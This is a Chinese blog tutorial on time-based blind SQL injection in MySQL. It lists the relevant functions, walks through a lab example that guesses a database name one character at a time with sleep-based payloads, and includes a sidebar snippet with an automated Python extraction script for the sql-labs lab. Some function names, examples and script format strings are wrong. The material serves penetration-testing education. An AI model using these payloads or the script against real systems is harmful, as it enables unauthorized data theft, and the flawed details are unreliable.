基于时间盲注

最新推荐文章于 2024-05-02 00:36:59 发布
最新推荐文章于 2024-05-02 00:36:59 发布
阅读量544 收藏 2
点赞数 2
分类专栏: 小课堂 文章标签: 时间注入 sql注入 web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/108861209
版权

遗憾的是,两个人不能在一起,却偏偏相遇。。。

----  网易云热评

一、函数介绍

1、sleep(5):暂停5秒再返回结果

2、if(条件,表达式1,表达式2):如果条件为真,返回表达式1,否则返回表达式2

3、substr('admin',2,3):从第二个位置开始截取长度为3的字符串,即dmi

4、substring('admin',2,3):效果和上面一样

5、substring('admin' from 2 for 1):截取一个字母,省略了逗号

6、substring('admin' from 2):从第二个字母开始截取

7、substring_index('1223334444','4',3):截取到4出现的第三次,即12233344

8、rlike '^12' 或者regext '^12':正则判断是不是从12开头的字符串  例子:select * from user where pass regexp '^12';

9、case when...then...end:判断条件,如果查询有结果返回,否则返回什么,例子:select case when username='admin' then 'admin' else 'xxx' end from user; 

10、sdcii():获取字母的ASCII码

11、benchmark():重复执行,例子:benchmark(10000000,sha(1))

12、select count(*) from user a , uer b ;  select count(*) from user 得到结果再乘以结果

13、mid():截取函数,mid("aiyoubucuo",1,1)mid("aiyoubucuo" from 1 for 1); 结果都为1

14、left()/right():从左/从右截取的字符串 left("aiyou",1) right("aiyou",1)

15、ord():ord("abc"),返回结果为首字母的ASCII码,a

16、asc/desc:升序/降序排列  order by id asc;

二、实例

1、访问:http://192.168.152.128/aiyou/1.php?id=2

2、构造条件语句:http://192.168.152.128/aiyou/1.php?id=2' and 1=1 --+

3、判断数据库名称

将条件改为:if(ascii(substr(database(),1,1))=97,sleep(4),null),如果数据库的第一个是a,就暂停4秒

 

不停修改数字,直到106,发现停留了4秒,说明数据库的第一个字母是j

 

再将1修改为2,判断数据库名字的第二个字母,发现正好是a

 

 

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

 

web安全工具库
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Blind_SPOT:盲点是一个python工具,用于盲注漏洞,基于SQLi时间,命令注入,代码注入,SSTI
05-30
盲点 盲点是一个python工具,用于盲注漏洞,基于SQLi时间,命令注入,代码注入,SSTI 要求 :- Python3 请求和 colorama 库 用法 :- -u ===>目标网址 在您的注入区域或参数中添加 [*] -p payload_list ,有 r zahir009 与工具 <3 python3 -u -p 有效载荷列表 保持 H4cking .. ^^
关于时间盲注的一些方法
huang_q_i的博客
07-23 183
时间盲注的一些tips
2024年网络安全最新超硬核,SQL注入时间盲注,原理+步骤+实战思路
最新发布
2401_84252281的博客
05-02 238
如果页面响应时间超过5秒,说明长度判断正确(sleep(5));如果页面响应时间不超过5秒(正常响应),说明长度判断错误,继续递增判断长度。
mysql rlike concat_时间盲注子查询与rlike
weixin_29611737的博客
02-07 1441
sql注入首先尝试单引号;当单引号不报错的时候,尝试宽字节注入%df'(--tamper=unmagicquotes)1、时间盲注子查询(SELECT(SLEEP(5)))jHpaPayload: id=1 AND 4301=BENCHMARK(5000000,MD5(0x67426a42))2、rlike报错当使用正则匹配时,使用REGEXP和NOTREGEXP操作符(或RLIKE和NOTR...
时间盲注(延迟注入
热门推荐
qq_51954912的博客
04-25 1万+
时间盲注简介 时间盲注,个人理解,适用于页面不会返回错误信息,只会回显一种界面,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。 官方理解:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。(除了看不懂,哪都好)。 利用sql-labs第九关进行实操演示
SQL注入学习——时间盲注详解 sqli-labs(Less 9)
未完成的歌~的博客
09-01 4316
Less-9 基于时间的双引号盲注
第九节 POST基于时间和布尔的盲注-01
09-15
_POST 基于时间和布尔的盲注_ 在 Web 应用程序安全测试中,盲注是一种常见的攻防手法。盲注可以分为基于时间盲注和基于布尔的盲注两种。下面我们将详细介绍这两种盲注技术。 一、HTTP POST 介绍 在 HTTP 协议中...
mysql-blind(高级盲注+基于布尔).docx
01-23
盲注主要分为基于时间、布尔和错误的三种类型,本篇将专注于布尔型盲注的详细讲解。 0x01 什么是布尔型盲注 布尔型盲注是通过判断SQL语句执行结果是否影响页面的输出状态来探测注入点是否存在。如果注入的条件为真...
布尔盲注python脚本.zip
12-28
- 延迟检测:对于基于响应时间的判断,可能需要使用定时器来测量请求之间的延迟,以确定是否存在差异。 - 逻辑判断:Python脚本将根据预设的判断逻辑(如响应时间阈值、状态码匹配等)来确认注入的有效性。 5. **...
SQL盲注利用工具
11-15
2. **时间盲注**:与延迟盲注类似,但不是通过延时函数,而是通过精确计算查询执行的时间差异来获取信息。例如,使用IF()或CASE WHEN...THEN...END语句,根据不同的结果路径来改变查询执行的时间。 3. **基于字符的...
sql盲注检测的简单脚本.zip
03-10
2. **盲注类型**:盲注通常分为时间盲注和布尔基盲注时间盲注是通过判断查询执行时间来确定结果,比如注入一个延时操作,看系统响应时间是否改变。布尔基盲注则依赖于系统的返回状态,例如,通过观察“存在”...
SQL注入原理-时间盲注
T1ngSh0w的博客
09-16 3435
SQL注入原理-时间盲注+手写python脚本
基于时间盲注原理简介
m0_38103658的博客
08-30 6368
基于时间盲注 盲注简介 盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注盲注原理 盲注的本质就是猜解,在没有回显数据的情况下,我们只能靠‘感觉’来体会每次查询时一点点细微的差异,而这差异包括运行时间的差异和页面返回结果的差异。 对于基于布尔的盲注来说,我们可以构造一条注入语句来测试我们输入的布尔表...
渗透测试基础-盲注(布尔盲注时间盲注
weixin_45488495的博客
04-09 4286
渗透测试基础-盲注布尔盲注时间盲注盲注实现的关键函数布尔盲注靶场演练时间盲注靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 盲注的特点如它的名字那样,它关闭了因恶意语句而导致的报错,也没有了像显错注入那样醒目的提醒。它的提示会很隐晦,就看我们有没有能力能让它显现出来。 布尔盲注时间盲注 盲注也分布尔盲注时间盲注,这里分别来了解一下各自的区别 布尔盲注:相较于显错注入,反应会更隐晦,比如当执行的恶意语句条件为Fal
基于时间盲注
Z_l123的博客
02-18 1254
关于时间(延时)盲注 某些场合下,页面只有一种返回结果,使用具有延时功能的函数sleep()、benchmark()等,通过判断这些函数是否正常执行来获取数据库中的数据。 一些功能函数的说明 length(str):返回字符串(str)的长度,以字节为单位。 substr(str,pos,len):从指定的位置(pos)开始,截取并返回字符串(str)指定长度(len)的子串。 ascii(str):返回字符串(str)最左边字符的ASCll码。 if(expr1,expr2,expr3):条件判断函
时间盲注(ctfhub)
2401_82985722的博客
03-29 1136
(布尔盲注直接使用length进行筛选:按照length从高到低排序 前面四个即为结果,按照payload1的顺序进行排序得到数据库名sqli。(已经知道长度为4,可以直接设置为4,不知道时 设置比需要爆破字符的长度长。(5)点击开始攻击得到结果,sleep(5)要筛选出响应时间大于5s的数据包。condition为条件,条件为真时返回true,条件为假时返回false。再进行筛选,响应时间最大的四个就是执行成功的——sqli。# -D 指定库,-T指定表,-C 指定列(字段)(爆破字段为26个英文字母)
渗透测试——sql注入进阶/基于时间盲注/一看就会/
ChenD的学习笔记
10-06 1770
基于时间盲注
mysql 延时 注入_MySQL时间盲注五种延时方法
weixin_39561168的博客
01-19 1716
延时注入函数五种:sleep(),benchmark(t,exp),笛卡尔积,GET_LOCK() RLIKE正则sleep()sleep(x)select sleep(5);benchmark() 重复执行某表达式benchmark(t,exp)select benchmark(count,expr),是重复执行count次expr表达式,使得处理时间很长,来产生延迟,比如select benc...
时间盲注
heibaikong6的博客
09-14 3834
文章目录简介步骤函数构建判断语句构建暴库语句实操 简介 时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站没有错误和正确的页面回显,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。 步骤 设置时间延迟,正确的延迟,错误则不会延迟来进行猜测,得到正确的闭合 继续利用设置时间延迟,正确的延迟,错误则不会延迟来进行猜测各种数据 函数 length() 返...
能帮我写一个Python程序,基于sql-lab第九关的时间盲注,要能够获取数据库名,表名,列名和数据的。
06-06
当然可以帮你写一个基于时间盲注的Python程序,获取数据库名,表名,列名和数据。以下是示例代码: ```python import requests import string # 数据库名长度 db_name_length = 0 # 数据库名 db_name = '' # 表名列表 table_names = [] # 列名列表 column_names = [] # 数据列表 data_list = [] # SQL注入语句的前缀和后缀 sql_prefix = "1' and if((select ascii(substring(database(),{},1)))={},sleep(3),1)-- -" sql_suffix = '' # 发送请求的函数 def make_request(payload): url = "http://your-ip/sql-lab/my-query" data = { 'query': payload, 'submit': 'Submit Query' } headers = { 'Cookie': 'session=your-session-id' } response = requests.post(url, data=data, headers=headers) return response.elapsed.total_seconds() # 获取数据库名长度 for i in range(1, 100): payload = sql_prefix.format(i, 97) if make_request(payload) >= 3: db_name_length = i break # 获取数据库名 for i in range(1, db_name_length + 1): for j in string.printable: payload = sql_prefix.format(i, ord(j)) if make_request(payload) >= 3: db_name += j break # 获取表名列表 payload = "1' and if((select count(*) from information_schema.tables where table_schema='{}')={},sleep(3),1)-- -".format(db_name, 0) if make_request(payload) >= 3: table_count_payload = "1' and if((select count(*) from information_schema.tables where table_schema='{}')={},sleep(3),1)-- -".format(db_name, 1) table_count = 0 for i in range(1, 100): payload = table_count_payload.format(i) if make_request(payload) >= 3: table_count = i break for i in range(table_count): table_payload = "1' and if((select ascii(substring(table_name,{},1)) from information_schema.tables where table_schema='{}' limit {},1)={},sleep(3),1)-- -".format(1, db_name, i, 0) table_name_length = 0 for j in range(1, 100): payload = table_payload.format(j) if make_request(payload) >= 3: table_name_length = j break table_name = '' for j in range(1, table_name_length + 1): for k in string.printable: payload = "1' and if((select ascii(substring(table_name,{},1)) from information_schema.tables where table_schema='{}' limit {},1)={},sleep(3),1)-- -".format(j, db_name, i, ord(k)) if make_request(payload) >= 3: table_name += k break table_names.append(table_name) # 获取列名列表和数据列表 for table_name in table_names: column_payload = "1' and if((select count(*) from information_schema.columns where table_schema='{}' and table_name='{}')={},sleep(3),1)-- -".format(db_name, table_name, 0) if make_request(column_payload) >= 3: column_count_payload = "1' and if((select count(*) from information_schema.columns where table_schema='{}' and table_name='{}')={},sleep(3),1)-- -".format(db_name, table_name, 1) column_count = 0 for i in range(1, 100): payload = column_count_payload.format(i) if make_request(payload) >= 3: column_count = i break for i in range(column_count): column_payload = "1' and if((select ascii(substring(column_name,{},1)) from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1)={},sleep(3),1)-- -".format(1, db_name, table_name, i, 0) column_name_length = 0 for j in range(1, 100): payload = column_payload.format(j) if make_request(payload) >= 3: column_name_length = j break column_name = '' for j in range(1, column_name_length + 1): for k in string.printable: payload = "1' and if((select ascii(substring(column_name,{},1)) from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1)={},sleep(3),1)-- -".format(j, db_name, table_name, i, ord(k)) if make_request(payload) >= 3: column_name += k break column_names.append(column_name) data_payload = "1' and if((select count(*) from {})={},sleep(3),1)-- -".format(table_name, 0) if make_request(data_payload) >= 3: data_count_payload = "1' and if((select count(*) from {})={},sleep(3),1)-- -".format(table_name, 1) data_count = 0 for j in range(1, 100): payload = data_count_payload.format(j) if make_request(payload) >= 3: data_count = j break for j in range(data_count): data_item = {} for column_name in column_names: data_payload = "1' and if((select ascii(substring({},1)) from {} limit {},1)={},sleep(3),1)-- -".format(column_name, table_name, j, 0) data_length = 0 for k in range(1, 100): payload = data_payload.format(k) if make_request(payload) >= 3: data_length = k break data_value = '' for k in range(1, data_length + 1): for l in string.printable: payload = "1' and if((select ascii(substring({},{})) from {} limit {},1)={},sleep(3),1)-- -".format(column_name, k, table_name, j, ord(l)) if make_request(payload) >= 3: data_value += l break data_item[column_name] = data_value data_list.append(data_item) # 打印结果 print('Database name: {}'.format(db_name)) print('Table names: {}'.format(table_names)) print('Column names: {}'.format(column_names)) print('Data: {}'.format(data_list)) ``` 需要修改的地方: 1. 将 `your-ip` 替换成 sql-lab 的 IP 地址 2. 将 `your-session-id` 替换成你的 sql-lab 的 session ID 注意:这个程序只适用于 sql-lab 第九关的时间盲注。如果你要用于其他情况,请适当修改代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值